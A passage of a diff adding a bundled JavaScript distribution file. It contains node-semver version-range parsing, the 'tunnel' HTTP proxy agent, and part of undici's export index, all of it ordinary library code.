loose) >= 0 +} + +exports.lte = lte +function lte (a, b, loose) { + return compare(a, b, loose) <= 0 +} + +exports.cmp = cmp +function cmp (a, op, b, loose) { + switch (op) { + case '===': + if (typeof a === 'object') + a = a.version + if (typeof b === 'object') + b = b.version + return a === b + + case '!==': + if (typeof a === 'object') + a = a.version + if (typeof b === 'object') + b = b.version + return a !== b + + case '': + case '=': + case '==': + return eq(a, b, loose) + + case '!=': + return neq(a, b, loose) + + case '>': + return gt(a, b, loose) + + case '>=': + return gte(a, b, loose) + + case '<': + return lt(a, b, loose) + + case '<=': + return lte(a, b, loose) + + default: + throw new TypeError('Invalid operator: ' + op) + } +} + +exports.Comparator = Comparator +function Comparator (comp, options) { + if (!options || typeof options !== 'object') { + options = { + loose: !!options, + includePrerelease: false + } + } + + if (comp instanceof Comparator) { + if (comp.loose === !!options.loose) { + return comp + } else { + comp = comp.value + } + } + + if (!(this instanceof Comparator)) { + return new Comparator(comp, options) + } + + comp = comp.trim().split(/\s+/).join(' ') + debug('comparator', comp, options) + this.options = options + this.loose = !!options.loose + this.parse(comp) + + if (this.semver === ANY) { + this.value = '' + } else { + this.value = this.operator + this.semver.version + } + + debug('comp', this) +} + +var ANY = {} +Comparator.prototype.parse = function (comp) { + var r = this.options.loose ? safeRe[t.COMPARATORLOOSE] : safeRe[t.COMPARATOR] + var m = comp.match(r) + + if (!m) { + throw new TypeError('Invalid comparator: ' + comp) + } + + this.operator = m[1] !== undefined ? m[1] : '' + if (this.operator === '=') { + this.operator = '' + } + + // if it literally is just '>' or '' then allow anything. + if (!m[2]) { + this.semver = ANY + } else { + this.semver = new SemVer(m[2], this.options.loose) + } +} + +Comparator.prototype.toString = function () { + return this.value +} + +Comparator.prototype.test = function (version) { + debug('Comparator.test', version, this.options.loose) + + if (this.semver === ANY || version === ANY) { + return true + } + + if (typeof version === 'string') { + try { + version = new SemVer(version, this.options) + } catch (er) { + return false + } + } + + return cmp(version, this.operator, this.semver, this.options) +} + +Comparator.prototype.intersects = function (comp, options) { + if (!(comp instanceof Comparator)) { + throw new TypeError('a Comparator is required') + } + + if (!options || typeof options !== 'object') { + options = { + loose: !!options, + includePrerelease: false + } + } + + var rangeTmp + + if (this.operator === '') { + if (this.value === '') { + return true + } + rangeTmp = new Range(comp.value, options) + return satisfies(this.value, rangeTmp, options) + } else if (comp.operator === '') { + if (comp.value === '') { + return true + } + rangeTmp = new Range(this.value, options) + return satisfies(comp.semver, rangeTmp, options) + } + + var sameDirectionIncreasing = + (this.operator === '>=' || this.operator === '>') && + (comp.operator === '>=' || comp.operator === '>') + var sameDirectionDecreasing = + (this.operator === '<=' || this.operator === '<') && + (comp.operator === '<=' || comp.operator === '<') + var sameSemVer = this.semver.version === comp.semver.version + var differentDirectionsInclusive = + (this.operator === '>=' || this.operator === '<=') && + (comp.operator === '>=' || comp.operator === '<=') + var oppositeDirectionsLessThan = + cmp(this.semver, '<', comp.semver, options) && + ((this.operator === '>=' || this.operator === '>') && + (comp.operator === '<=' || comp.operator === '<')) + var oppositeDirectionsGreaterThan = + cmp(this.semver, '>', comp.semver, options) && + ((this.operator === '<=' || this.operator === '<') && + (comp.operator === '>=' || comp.operator === '>')) + + return sameDirectionIncreasing || sameDirectionDecreasing || + (sameSemVer && differentDirectionsInclusive) || + oppositeDirectionsLessThan || oppositeDirectionsGreaterThan +} + +exports.Range = Range +function Range (range, options) { + if (!options || typeof options !== 'object') { + options = { + loose: !!options, + includePrerelease: false + } + } + + if (range instanceof Range) { + if (range.loose === !!options.loose && + range.includePrerelease === !!options.includePrerelease) { + return range + } else { + return new Range(range.raw, options) + } + } + + if (range instanceof Comparator) { + return new Range(range.value, options) + } + + if (!(this instanceof Range)) { + return new Range(range, options) + } + + this.options = options + this.loose = !!options.loose + this.includePrerelease = !!options.includePrerelease + + // First reduce all whitespace as much as possible so we do not have to rely + // on potentially slow regexes like \s*. This is then stored and used for + // future error messages as well. + this.raw = range + .trim() + .split(/\s+/) + .join(' ') + + // First, split based on boolean or || + this.set = this.raw.split('||').map(function (range) { + return this.parseRange(range.trim()) + }, this).filter(function (c) { + // throw out any that are not relevant for whatever reason + return c.length + }) + + if (!this.set.length) { + throw new TypeError('Invalid SemVer Range: ' + this.raw) + } + + this.format() +} + +Range.prototype.format = function () { + this.range = this.set.map(function (comps) { + return comps.join(' ').trim() + }).join('||').trim() + return this.range +} + +Range.prototype.toString = function () { + return this.range +} + +Range.prototype.parseRange = function (range) { + var loose = this.options.loose + // `1.2.3 - 1.2.4` => `>=1.2.3 <=1.2.4` + var hr = loose ? safeRe[t.HYPHENRANGELOOSE] : safeRe[t.HYPHENRANGE] + range = range.replace(hr, hyphenReplace) + debug('hyphen replace', range) + // `> 1.2.3 < 1.2.5` => `>1.2.3 <1.2.5` + range = range.replace(safeRe[t.COMPARATORTRIM], comparatorTrimReplace) + debug('comparator trim', range, safeRe[t.COMPARATORTRIM]) + + // `~ 1.2.3` => `~1.2.3` + range = range.replace(safeRe[t.TILDETRIM], tildeTrimReplace) + + // `^ 1.2.3` => `^1.2.3` + range = range.replace(safeRe[t.CARETTRIM], caretTrimReplace) + + // normalize spaces + range = range.split(/\s+/).join(' ') + + // At this point, the range is completely trimmed and + // ready to be split into comparators. + + var compRe = loose ? safeRe[t.COMPARATORLOOSE] : safeRe[t.COMPARATOR] + var set = range.split(' ').map(function (comp) { + return parseComparator(comp, this.options) + }, this).join(' ').split(/\s+/) + if (this.options.loose) { + // in loose mode, throw out any that are not valid comparators + set = set.filter(function (comp) { + return !!comp.match(compRe) + }) + } + set = set.map(function (comp) { + return new Comparator(comp, this.options) + }, this) + + return set +} + +Range.prototype.intersects = function (range, options) { + if (!(range instanceof Range)) { + throw new TypeError('a Range is required') + } + + return this.set.some(function (thisComparators) { + return ( + isSatisfiable(thisComparators, options) && + range.set.some(function (rangeComparators) { + return ( + isSatisfiable(rangeComparators, options) && + thisComparators.every(function (thisComparator) { + return rangeComparators.every(function (rangeComparator) { + return thisComparator.intersects(rangeComparator, options) + }) + }) + ) + }) + ) + }) +} + +// take a set of comparators and determine whether there +// exists a version which can satisfy it +function isSatisfiable (comparators, options) { + var result = true + var remainingComparators = comparators.slice() + var testComparator = remainingComparators.pop() + + while (result && remainingComparators.length) { + result = remainingComparators.every(function (otherComparator) { + return testComparator.intersects(otherComparator, options) + }) + + testComparator = remainingComparators.pop() + } + + return result +} + +// Mostly just for testing and legacy API reasons +exports.toComparators = toComparators +function toComparators (range, options) { + return new Range(range, options).set.map(function (comp) { + return comp.map(function (c) { + return c.value + }).join(' ').trim().split(' ') + }) +} + +// comprised of xranges, tildes, stars, and gtlt's at this point. +// already replaced the hyphen ranges +// turn into a set of JUST comparators. +function parseComparator (comp, options) { + debug('comp', comp, options) + comp = replaceCarets(comp, options) + debug('caret', comp) + comp = replaceTildes(comp, options) + debug('tildes', comp) + comp = replaceXRanges(comp, options) + debug('xrange', comp) + comp = replaceStars(comp, options) + debug('stars', comp) + return comp +} + +function isX (id) { + return !id || id.toLowerCase() === 'x' || id === '*' +} + +// ~, ~> --> * (any, kinda silly) +// ~2, ~2.x, ~2.x.x, ~>2, ~>2.x ~>2.x.x --> >=2.0.0 <3.0.0 +// ~2.0, ~2.0.x, ~>2.0, ~>2.0.x --> >=2.0.0 <2.1.0 +// ~1.2, ~1.2.x, ~>1.2, ~>1.2.x --> >=1.2.0 <1.3.0 +// ~1.2.3, ~>1.2.3 --> >=1.2.3 <1.3.0 +// ~1.2.0, ~>1.2.0 --> >=1.2.0 <1.3.0 +function replaceTildes (comp, options) { + return comp.trim().split(/\s+/).map(function (comp) { + return replaceTilde(comp, options) + }).join(' ') +} + +function replaceTilde (comp, options) { + var r = options.loose ? safeRe[t.TILDELOOSE] : safeRe[t.TILDE] + return comp.replace(r, function (_, M, m, p, pr) { + debug('tilde', comp, _, M, m, p, pr) + var ret + + if (isX(M)) { + ret = '' + } else if (isX(m)) { + ret = '>=' + M + '.0.0 <' + (+M + 1) + '.0.0' + } else if (isX(p)) { + // ~1.2 == >=1.2.0 <1.3.0 + ret = '>=' + M + '.' + m + '.0 <' + M + '.' + (+m + 1) + '.0' + } else if (pr) { + debug('replaceTilde pr', pr) + ret = '>=' + M + '.' + m + '.' + p + '-' + pr + + ' <' + M + '.' + (+m + 1) + '.0' + } else { + // ~1.2.3 == >=1.2.3 <1.3.0 + ret = '>=' + M + '.' + m + '.' + p + + ' <' + M + '.' + (+m + 1) + '.0' + } + + debug('tilde return', ret) + return ret + }) +} + +// ^ --> * (any, kinda silly) +// ^2, ^2.x, ^2.x.x --> >=2.0.0 <3.0.0 +// ^2.0, ^2.0.x --> >=2.0.0 <3.0.0 +// ^1.2, ^1.2.x --> >=1.2.0 <2.0.0 +// ^1.2.3 --> >=1.2.3 <2.0.0 +// ^1.2.0 --> >=1.2.0 <2.0.0 +function replaceCarets (comp, options) { + return comp.trim().split(/\s+/).map(function (comp) { + return replaceCaret(comp, options) + }).join(' ') +} + +function replaceCaret (comp, options) { + debug('caret', comp, options) + var r = options.loose ? safeRe[t.CARETLOOSE] : safeRe[t.CARET] + return comp.replace(r, function (_, M, m, p, pr) { + debug('caret', comp, _, M, m, p, pr) + var ret + + if (isX(M)) { + ret = '' + } else if (isX(m)) { + ret = '>=' + M + '.0.0 <' + (+M + 1) + '.0.0' + } else if (isX(p)) { + if (M === '0') { + ret = '>=' + M + '.' + m + '.0 <' + M + '.' + (+m + 1) + '.0' + } else { + ret = '>=' + M + '.' + m + '.0 <' + (+M + 1) + '.0.0' + } + } else if (pr) { + debug('replaceCaret pr', pr) + if (M === '0') { + if (m === '0') { + ret = '>=' + M + '.' + m + '.' + p + '-' + pr + + ' <' + M + '.' + m + '.' + (+p + 1) + } else { + ret = '>=' + M + '.' + m + '.' + p + '-' + pr + + ' <' + M + '.' + (+m + 1) + '.0' + } + } else { + ret = '>=' + M + '.' + m + '.' + p + '-' + pr + + ' <' + (+M + 1) + '.0.0' + } + } else { + debug('no pr') + if (M === '0') { + if (m === '0') { + ret = '>=' + M + '.' + m + '.' + p + + ' <' + M + '.' + m + '.' + (+p + 1) + } else { + ret = '>=' + M + '.' + m + '.' + p + + ' <' + M + '.' + (+m + 1) + '.0' + } + } else { + ret = '>=' + M + '.' + m + '.' + p + + ' <' + (+M + 1) + '.0.0' + } + } + + debug('caret return', ret) + return ret + }) +} + +function replaceXRanges (comp, options) { + debug('replaceXRanges', comp, options) + return comp.split(/\s+/).map(function (comp) { + return replaceXRange(comp, options) + }).join(' ') +} + +function replaceXRange (comp, options) { + comp = comp.trim() + var r = options.loose ? safeRe[t.XRANGELOOSE] : safeRe[t.XRANGE] + return comp.replace(r, function (ret, gtlt, M, m, p, pr) { + debug('xRange', comp, ret, gtlt, M, m, p, pr) + var xM = isX(M) + var xm = xM || isX(m) + var xp = xm || isX(p) + var anyX = xp + + if (gtlt === '=' && anyX) { + gtlt = '' + } + + // if we're including prereleases in the match, then we need + // to fix this to -0, the lowest possible prerelease value + pr = options.includePrerelease ? '-0' : '' + + if (xM) { + if (gtlt === '>' || gtlt === '<') { + // nothing is allowed + ret = '<0.0.0-0' + } else { + // nothing is forbidden + ret = '*' + } + } else if (gtlt && anyX) { + // we know patch is an x, because we have any x at all. + // replace X with 0 + if (xm) { + m = 0 + } + p = 0 + + if (gtlt === '>') { + // >1 => >=2.0.0 + // >1.2 => >=1.3.0 + // >1.2.3 => >= 1.2.4 + gtlt = '>=' + if (xm) { + M = +M + 1 + m = 0 + p = 0 + } else { + m = +m + 1 + p = 0 + } + } else if (gtlt === '<=') { + // <=0.7.x is actually <0.8.0, since any 0.7.x should + // pass. Similarly, <=7.x is actually <8.0.0, etc. + gtlt = '<' + if (xm) { + M = +M + 1 + } else { + m = +m + 1 + } + } + + ret = gtlt + M + '.' + m + '.' + p + pr + } else if (xm) { + ret = '>=' + M + '.0.0' + pr + ' <' + (+M + 1) + '.0.0' + pr + } else if (xp) { + ret = '>=' + M + '.' + m + '.0' + pr + + ' <' + M + '.' + (+m + 1) + '.0' + pr + } + + debug('xRange return', ret) + + return ret + }) +} + +// Because * is AND-ed with everything else in the comparator, +// and '' means "any version", just remove the *s entirely. +function replaceStars (comp, options) { + debug('replaceStars', comp, options) + // Looseness is ignored here. star is always as loose as it gets! + return comp.trim().replace(safeRe[t.STAR], '') +} + +// This function is passed to string.replace(re[t.HYPHENRANGE]) +// M, m, patch, prerelease, build +// 1.2 - 3.4.5 => >=1.2.0 <=3.4.5 +// 1.2.3 - 3.4 => >=1.2.0 <3.5.0 Any 3.4.x will do +// 1.2 - 3.4 => >=1.2.0 <3.5.0 +function hyphenReplace ($0, + from, fM, fm, fp, fpr, fb, + to, tM, tm, tp, tpr, tb) { + if (isX(fM)) { + from = '' + } else if (isX(fm)) { + from = '>=' + fM + '.0.0' + } else if (isX(fp)) { + from = '>=' + fM + '.' + fm + '.0' + } else { + from = '>=' + from + } + + if (isX(tM)) { + to = '' + } else if (isX(tm)) { + to = '<' + (+tM + 1) + '.0.0' + } else if (isX(tp)) { + to = '<' + tM + '.' + (+tm + 1) + '.0' + } else if (tpr) { + to = '<=' + tM + '.' + tm + '.' + tp + '-' + tpr + } else { + to = '<=' + to + } + + return (from + ' ' + to).trim() +} + +// if ANY of the sets match ALL of its comparators, then pass +Range.prototype.test = function (version) { + if (!version) { + return false + } + + if (typeof version === 'string') { + try { + version = new SemVer(version, this.options) + } catch (er) { + return false + } + } + + for (var i = 0; i < this.set.length; i++) { + if (testSet(this.set[i], version, this.options)) { + return true + } + } + return false +} + +function testSet (set, version, options) { + for (var i = 0; i < set.length; i++) { + if (!set[i].test(version)) { + return false + } + } + + if (version.prerelease.length && !options.includePrerelease) { + // Find the set of versions that are allowed to have prereleases + // For example, ^1.2.3-pr.1 desugars to >=1.2.3-pr.1 <2.0.0 + // That should allow `1.2.3-pr.2` to pass. + // However, `1.2.4-alpha.notready` should NOT be allowed, + // even though it's within the range set by the comparators. + for (i = 0; i < set.length; i++) { + debug(set[i].semver) + if (set[i].semver === ANY) { + continue + } + + if (set[i].semver.prerelease.length > 0) { + var allowed = set[i].semver + if (allowed.major === version.major && + allowed.minor === version.minor && + allowed.patch === version.patch) { + return true + } + } + } + + // Version has a -pre, but it's not one of the ones we like. + return false + } + + return true +} + +exports.satisfies = satisfies +function satisfies (version, range, options) { + try { + range = new Range(range, options) + } catch (er) { + return false + } + return range.test(version) +} + +exports.maxSatisfying = maxSatisfying +function maxSatisfying (versions, range, options) { + var max = null + var maxSV = null + try { + var rangeObj = new Range(range, options) + } catch (er) { + return null + } + versions.forEach(function (v) { + if (rangeObj.test(v)) { + // satisfies(v, range, options) + if (!max || maxSV.compare(v) === -1) { + // compare(max, v, true) + max = v + maxSV = new SemVer(max, options) + } + } + }) + return max +} + +exports.minSatisfying = minSatisfying +function minSatisfying (versions, range, options) { + var min = null + var minSV = null + try { + var rangeObj = new Range(range, options) + } catch (er) { + return null + } + versions.forEach(function (v) { + if (rangeObj.test(v)) { + // satisfies(v, range, options) + if (!min || minSV.compare(v) === 1) { + // compare(min, v, true) + min = v + minSV = new SemVer(min, options) + } + } + }) + return min +} + +exports.minVersion = minVersion +function minVersion (range, loose) { + range = new Range(range, loose) + + var minver = new SemVer('0.0.0') + if (range.test(minver)) { + return minver + } + + minver = new SemVer('0.0.0-0') + if (range.test(minver)) { + return minver + } + + minver = null + for (var i = 0; i < range.set.length; ++i) { + var comparators = range.set[i] + + comparators.forEach(function (comparator) { + // Clone to avoid manipulating the comparator's semver object. + var compver = new SemVer(comparator.semver.version) + switch (comparator.operator) { + case '>': + if (compver.prerelease.length === 0) { + compver.patch++ + } else { + compver.prerelease.push(0) + } + compver.raw = compver.format() + /* fallthrough */ + case '': + case '>=': + if (!minver || gt(minver, compver)) { + minver = compver + } + break + case '<': + case '<=': + /* Ignore maximum versions */ + break + /* istanbul ignore next */ + default: + throw new Error('Unexpected operation: ' + comparator.operator) + } + }) + } + + if (minver && range.test(minver)) { + return minver + } + + return null +} + +exports.validRange = validRange +function validRange (range, options) { + try { + // Return '*' instead of '' so that truthiness works. + // This will throw if it's invalid anyway + return new Range(range, options).range || '*' + } catch (er) { + return null + } +} + +// Determine if version is less than all the versions possible in the range +exports.ltr = ltr +function ltr (version, range, options) { + return outside(version, range, '<', options) +} + +// Determine if version is greater than all the versions possible in the range. +exports.gtr = gtr +function gtr (version, range, options) { + return outside(version, range, '>', options) +} + +exports.outside = outside +function outside (version, range, hilo, options) { + version = new SemVer(version, options) + range = new Range(range, options) + + var gtfn, ltefn, ltfn, comp, ecomp + switch (hilo) { + case '>': + gtfn = gt + ltefn = lte + ltfn = lt + comp = '>' + ecomp = '>=' + break + case '<': + gtfn = lt + ltefn = gte + ltfn = gt + comp = '<' + ecomp = '<=' + break + default: + throw new TypeError('Must provide a hilo val of "<" or ">"') + } + + // If it satisifes the range it is not outside + if (satisfies(version, range, options)) { + return false + } + + // From now on, variable terms are as if we're in "gtr" mode. + // but note that everything is flipped for the "ltr" function. + + for (var i = 0; i < range.set.length; ++i) { + var comparators = range.set[i] + + var high = null + var low = null + + comparators.forEach(function (comparator) { + if (comparator.semver === ANY) { + comparator = new Comparator('>=0.0.0') + } + high = high || comparator + low = low || comparator + if (gtfn(comparator.semver, high.semver, options)) { + high = comparator + } else if (ltfn(comparator.semver, low.semver, options)) { + low = comparator + } + }) + + // If the edge version comparator has a operator then our version + // isn't outside it + if (high.operator === comp || high.operator === ecomp) { + return false + } + + // If the lowest version comparator has an operator and our version + // is less than it then it isn't higher than the range + if ((!low.operator || low.operator === comp) && + ltefn(version, low.semver)) { + return false + } else if (low.operator === ecomp && ltfn(version, low.semver)) { + return false + } + } + return true +} + +exports.prerelease = prerelease +function prerelease (version, options) { + var parsed = parse(version, options) + return (parsed && parsed.prerelease.length) ? parsed.prerelease : null +} + +exports.intersects = intersects +function intersects (r1, r2, options) { + r1 = new Range(r1, options) + r2 = new Range(r2, options) + return r1.intersects(r2) +} + +exports.coerce = coerce +function coerce (version, options) { + if (version instanceof SemVer) { + return version + } + + if (typeof version === 'number') { + version = String(version) + } + + if (typeof version !== 'string') { + return null + } + + options = options || {} + + var match = null + if (!options.rtl) { + match = version.match(safeRe[t.COERCE]) + } else { + // Find the right-most coercible string that does not share + // a terminus with a more left-ward coercible string. + // Eg, '1.2.3.4' wants to coerce '2.3.4', not '3.4' or '4' + // + // Walk through the string checking with a /g regexp + // Manually set the index so as to pick up overlapping matches. + // Stop when we get a match that ends at the string end, since no + // coercible string can be more right-ward without the same terminus. + var next + while ((next = safeRe[t.COERCERTL].exec(version)) && + (!match || match.index + match[0].length !== version.length) + ) { + if (!match || + next.index + next[0].length !== match.index + match[0].length) { + match = next + } + safeRe[t.COERCERTL].lastIndex = next.index + next[1].length + next[2].length + } + // leave it in a clean state + safeRe[t.COERCERTL].lastIndex = -1 + } + + if (match === null) { + return null + } + + return parse(match[2] + + '.' + (match[3] || '0') + + '.' + (match[4] || '0'), options) +} + + +/***/ }), + +/***/ 4294: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +module.exports = __nccwpck_require__(4219); + + +/***/ }), + +/***/ 4219: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +var net = __nccwpck_require__(1808); +var tls = __nccwpck_require__(4404); +var http = __nccwpck_require__(3685); +var https = __nccwpck_require__(5687); +var events = __nccwpck_require__(2361); +var assert = __nccwpck_require__(9491); +var util = __nccwpck_require__(3837); + + +exports.httpOverHttp = httpOverHttp; +exports.httpsOverHttp = httpsOverHttp; +exports.httpOverHttps = httpOverHttps; +exports.httpsOverHttps = httpsOverHttps; + + +function httpOverHttp(options) { + var agent = new TunnelingAgent(options); + agent.request = http.request; + return agent; +} + +function httpsOverHttp(options) { + var agent = new TunnelingAgent(options); + agent.request = http.request; + agent.createSocket = createSecureSocket; + agent.defaultPort = 443; + return agent; +} + +function httpOverHttps(options) { + var agent = new TunnelingAgent(options); + agent.request = https.request; + return agent; +} + +function httpsOverHttps(options) { + var agent = new TunnelingAgent(options); + agent.request = https.request; + agent.createSocket = createSecureSocket; + agent.defaultPort = 443; + return agent; +} + + +function TunnelingAgent(options) { + var self = this; + self.options = options || {}; + self.proxyOptions = self.options.proxy || {}; + self.maxSockets = self.options.maxSockets || http.Agent.defaultMaxSockets; + self.requests = []; + self.sockets = []; + + self.on('free', function onFree(socket, host, port, localAddress) { + var options = toOptions(host, port, localAddress); + for (var i = 0, len = self.requests.length; i < len; ++i) { + var pending = self.requests[i]; + if (pending.host === options.host && pending.port === options.port) { + // Detect the request to connect same origin server, + // reuse the connection. + self.requests.splice(i, 1); + pending.request.onSocket(socket); + return; + } + } + socket.destroy(); + self.removeSocket(socket); + }); +} +util.inherits(TunnelingAgent, events.EventEmitter); + +TunnelingAgent.prototype.addRequest = function addRequest(req, host, port, localAddress) { + var self = this; + var options = mergeOptions({request: req}, self.options, toOptions(host, port, localAddress)); + + if (self.sockets.length >= this.maxSockets) { + // We are over limit so we'll add it to the queue. + self.requests.push(options); + return; + } + + // If we are under maxSockets create a new one. + self.createSocket(options, function(socket) { + socket.on('free', onFree); + socket.on('close', onCloseOrRemove); + socket.on('agentRemove', onCloseOrRemove); + req.onSocket(socket); + + function onFree() { + self.emit('free', socket, options); + } + + function onCloseOrRemove(err) { + self.removeSocket(socket); + socket.removeListener('free', onFree); + socket.removeListener('close', onCloseOrRemove); + socket.removeListener('agentRemove', onCloseOrRemove); + } + }); +}; + +TunnelingAgent.prototype.createSocket = function createSocket(options, cb) { + var self = this; + var placeholder = {}; + self.sockets.push(placeholder); + + var connectOptions = mergeOptions({}, self.proxyOptions, { + method: 'CONNECT', + path: options.host + ':' + options.port, + agent: false, + headers: { + host: options.host + ':' + options.port + } + }); + if (options.localAddress) { + connectOptions.localAddress = options.localAddress; + } + if (connectOptions.proxyAuth) { + connectOptions.headers = connectOptions.headers || {}; + connectOptions.headers['Proxy-Authorization'] = 'Basic ' + + new Buffer(connectOptions.proxyAuth).toString('base64'); + } + + debug('making CONNECT request'); + var connectReq = self.request(connectOptions); + connectReq.useChunkedEncodingByDefault = false; // for v0.6 + connectReq.once('response', onResponse); // for v0.6 + connectReq.once('upgrade', onUpgrade); // for v0.6 + connectReq.once('connect', onConnect); // for v0.7 or later + connectReq.once('error', onError); + connectReq.end(); + + function onResponse(res) { + // Very hacky. This is necessary to avoid http-parser leaks. + res.upgrade = true; + } + + function onUpgrade(res, socket, head) { + // Hacky. + process.nextTick(function() { + onConnect(res, socket, head); + }); + } + + function onConnect(res, socket, head) { + connectReq.removeAllListeners(); + socket.removeAllListeners(); + + if (res.statusCode !== 200) { + debug('tunneling socket could not be established, statusCode=%d', + res.statusCode); + socket.destroy(); + var error = new Error('tunneling socket could not be established, ' + + 'statusCode=' + res.statusCode); + error.code = 'ECONNRESET'; + options.request.emit('error', error); + self.removeSocket(placeholder); + return; + } + if (head.length > 0) { + debug('got illegal response body from proxy'); + socket.destroy(); + var error = new Error('got illegal response body from proxy'); + error.code = 'ECONNRESET'; + options.request.emit('error', error); + self.removeSocket(placeholder); + return; + } + debug('tunneling connection has established'); + self.sockets[self.sockets.indexOf(placeholder)] = socket; + return cb(socket); + } + + function onError(cause) { + connectReq.removeAllListeners(); + + debug('tunneling socket could not be established, cause=%s\n', + cause.message, cause.stack); + var error = new Error('tunneling socket could not be established, ' + + 'cause=' + cause.message); + error.code = 'ECONNRESET'; + options.request.emit('error', error); + self.removeSocket(placeholder); + } +}; + +TunnelingAgent.prototype.removeSocket = function removeSocket(socket) { + var pos = this.sockets.indexOf(socket) + if (pos === -1) { + return; + } + this.sockets.splice(pos, 1); + + var pending = this.requests.shift(); + if (pending) { + // If we have pending requests and a socket gets closed a new one + // needs to be created to take over in the pool for the one that closed. + this.createSocket(pending, function(socket) { + pending.request.onSocket(socket); + }); + } +}; + +function createSecureSocket(options, cb) { + var self = this; + TunnelingAgent.prototype.createSocket.call(self, options, function(socket) { + var hostHeader = options.request.getHeader('host'); + var tlsOptions = mergeOptions({}, self.options, { + socket: socket, + servername: hostHeader ? hostHeader.replace(/:.*$/, '') : options.host + }); + + // 0 is dummy port for v0.6 + var secureSocket = tls.connect(0, tlsOptions); + self.sockets[self.sockets.indexOf(socket)] = secureSocket; + cb(secureSocket); + }); +} + + +function toOptions(host, port, localAddress) { + if (typeof host === 'string') { // since v0.10 + return { + host: host, + port: port, + localAddress: localAddress + }; + } + return host; // for v0.11 or later +} + +function mergeOptions(target) { + for (var i = 1, len = arguments.length; i < len; ++i) { + var overrides = arguments[i]; + if (typeof overrides === 'object') { + var keys = Object.keys(overrides); + for (var j = 0, keyLen = keys.length; j < keyLen; ++j) { + var k = keys[j]; + if (overrides[k] !== undefined) { + target[k] = overrides[k]; + } + } + } + } + return target; +} + + +var debug; +if (process.env.NODE_DEBUG && /\btunnel\b/.test(process.env.NODE_DEBUG)) { + debug = function() { + var args = Array.prototype.slice.call(arguments); + if (typeof args[0] === 'string') { + args[0] = 'TUNNEL: ' + args[0]; + } else { + args.unshift('TUNNEL:'); + } + console.error.apply(console, args); + } +} else { + debug = function() {}; +} +exports.debug = debug; // for test + + +/***/ }), + +/***/ 1773: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const Client = __nccwpck_require__(3598) +const Dispatcher = __nccwpck_require__(412) +const errors = __nccwpck_require__(8045) +const Pool = __nccwpck_require__(4634) +const BalancedPool = __nccwpck_require__(7931) +const Agent = __nccwpck_require__(7890) +const util = __nccwpck_require__(3983) +const { InvalidArgumentError } = errors +const api = __nccwpck_require__(4059) +const buildConnector = __nccwpck_require__(2067) +const MockClient = __nccwpck_require__(8687) +const MockAgent = __nccwpck_require__(6771) +const MockPool = __nccwpck_require__(6193) +const mockErrors = __nccwpck_require__(888) +const ProxyAgent = __nccwpck_require__(7858) +const RetryHandler = __nccwpck_require__(2286) +const { getGlobalDispatcher, setGlobalDispatcher } = __nccwpck_require__(1892) +const DecoratorHandler = __nccwpck_require__(6930) +const RedirectHandler = __nccwpck_require__(2860) +const createRedirectInterceptor = __nccwpck_require__(8861) + +let hasCrypto +try { + __nccwpck_require__(6113) + hasCrypto = true +} catch { + hasCrypto = false +} + +Object.assign(Dispatcher.prototype, api) + +module.exports.Dispatcher = Dispatcher +module.exports.Client = Client +module.exports.Pool = Pool +module.exports.BalancedPool = BalancedPool +module.exports.Agent = Agent +module.exports.ProxyAgent = ProxyAgent +module.exports.RetryHandler = RetryHandler + +module.exports.DecoratorHandler = DecoratorHandler +module.exports.RedirectHandler = RedirectHandler +module.exports.createRedirectInterceptor = createRedirectInterceptor + +module.exports.buildConnector = buildConnector +module.exports.errors = errors + +function makeDispatcher (fn) { + return (url, opts, handler) => { + if (typeof opts === 'function') { + handler = opts + opts = null + } + + if (!url || (typeof url !== 'string' && typeof url !== 'object' && !(url instanceof URL))) { + throw new InvalidArgumentError('invalid url') + } + + if (opts != null && typeof opts !== 'object') { + throw new InvalidArgumentError('invalid opts') + } + + if (opts && opts.path != null) { + if (typeof opts.path !== 'string') { + throw new InvalidArgumentError('invalid opts.path') + } + + let path = opts.path + if (!opts.path.startsWith('/')) { + path = `/${path}` + } + + url = new URL(util.parseOrigin(url).origin + path) + } else { + if (!opts) { + opts = typeof url === 'object' ? url : {} + } + + url = util.parseURL(url) + } + + const { agent, dispatcher = getGlobalDispatcher() } = opts + + if (agent) { + throw new InvalidArgumentError('unsupported opts.agent. Did you mean opts.client?') + } + + return fn.call(dispatcher, { + ...opts, + origin: url.origin, + path: url.search ? `${url.pathname}${url.search}` : url.pathname, + method: opts.method || (opts.body ? 'PUT' : 'GET') + }, handler) + } +} + +module.exports.setGlobalDispatcher = setGlobalDispatcher +module.exports.getGlobalDispatcher = getGlobalDispatcher + +if (util.nodeMajor > 16 || (util.nodeMajor === 16 && util.nodeMinor >= 8)) { + let fetchImpl = null + module.exports.fetch = async function fetch (resource) { + if (!fetchImpl) { + fetchImpl = (__nccwpck_require__(4881).fetch) + } + + try { + return await fetchImpl(...arguments) + } catch (err) { + if (typeof err === 'object') { + Error.captureStackTrace(err, this) + } + + throw err + } + } + module.exports.Headers = __nccwpck_require__(554).Headers + module.exports.Response = __nccwpck_require__(7823).Response + module.exports.Request = __nccwpck_require__(8359).Request + module.exports.FormData = __nccwpck_require__(2015).FormData + module.exports.File = __nccwpck_require__(8511).File + module.exports.FileReader = __nccwpck_require__(1446).FileReader + + const { setGlobalOrigin, getGlobalOrigin } = __nccwpck_require__(1246) + + module.exports.setGlobalOrigin = setGlobalOrigin + module.exports.getGlobalOrigin = getGlobalOrigin + + const { CacheStorage } = __nccwpck_require__(7907) + const { kConstruct } = __nccwpck_require__(9174) + + // Cache & CacheStorage are tightly coupled with fetch. Even if it may run + // in an older version of Node, it doesn't have any use without fetch. + module.exports.caches = new CacheStorage(kConstruct) +} + +if (util.nodeMajor >= 16) { + const { deleteCookie, getCookies, getSetCookies, setCookie } = __nccwpck_require__(1724) + + module.exports.deleteCookie = deleteCookie + module.exports.getCookies = getCookies + module.exports.getSetCookies = getSetCookies + module.exports.setCookie = setCookie + + const { parseMIMEType, serializeAMimeType } = __nccwpck_require__(685) + + module.exports.parseMIMEType = parseMIMEType + module.exports.serializeAMimeType = serializeAMimeType +} + +if (util.nodeMajor >= 18 && hasCrypto) { + const { WebSocket } = __nccwpck_require__(4284) + + module.exports.WebSocket = WebSocket +} + +module.exports.request = makeDispatcher(api.request) +module.exports.stream = makeDispatcher(api.stream) +module.exports.pipeline = makeDispatcher(api.pipeline) +module.exports.connect = makeDispatcher(api.connect) +module.exports.upgrade = makeDispatcher(api.upgrade) + +module.exports.MockClient = MockClient 